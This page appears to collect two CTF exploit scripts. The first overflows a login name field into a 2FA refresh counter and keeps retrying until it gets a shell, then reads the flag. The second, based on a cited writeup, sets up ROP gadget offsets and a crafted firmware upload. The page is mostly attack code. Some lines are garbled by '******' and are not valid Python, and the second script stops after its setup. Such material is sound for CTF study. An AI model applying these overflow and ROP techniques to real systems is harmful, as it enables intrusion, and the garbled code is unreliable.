예제 #1
import interact
import struct

p = interact.Process()  # handle to the target; `interact` is a CTF helper module, not stdlib

# Overflow the name field and set refresh to 0 (the author's description).
# Per the author, the oversized name reaches the refresh field; on the
# target side the defence is a bounded copy of the name input.
# NOTE(review): the '******' on this line looks like extraction garbling —
# as written this line is not valid Python. Confirm against the original source.
data = p.readuntil('Enter Admin Username:'******'A'*16 + '\x00'*8)
data = p.readuntil('Enter your 2FA Code:')

# Spam login attempts: resubmit the same 20-character code until the
# reply (read up to the next '!') contains 'shell'.
# NOTE(review): there is no iteration cap — if that marker never appears,
# readuntil blocks and this loop never exits.
while True:
    # Same '******' garbling as on the first read above.
    data = p.readuntil('Enter Admin Username:'******'A'*8)
    data = p.readuntil('Enter your 2FA Code:')
    p.sendline('0'*20)
    
    data = p.readuntil('!')
    # NOTE(review): assumes readuntil returns str (Python 2 style, consistent
    # with the '\x00' literals above); on bytes this `in` test raises TypeError.
    if 'shell' in data:
        p.sendline('cat flag')
        break

p.interactive()
예제 #2
# This writeup is based on: https://ctftime.org/writeup/11273

# Import the Python libraries and set up the target
import interact
import struct

target = interact.Process()  # handle to the target; `interact` is a CTF helper module, not stdlib

# Declare the needed ROP gadget offsets.
# NOTE(review): these are raw offsets; the base they are relative to and the
# exact build they were taken from are not shown on this page — they are only
# meaningful for that one build. Confirm against the linked writeup.
popRdi = 0x21102
popRax = 0x33544
popRsi = 0x202e8
popRdx = 0x1b92

binsh = 0x18cd57

syscall = 0xbc375

addRsp = 0xc96a6


# A function designed to set up the initial firmware to enable debugging
def debugFirmware():
    target.sendline('U')
    initialFirmware = "FW" + "\xa2\xc8" + "1081" + "9"
    initialFirmware = initialFirmware + "\x00" * (0x400 - len(initialFirmware))
    target.sendline(initialFirmware)
    target.sendline(initialFirmware)
    target.sendline('E')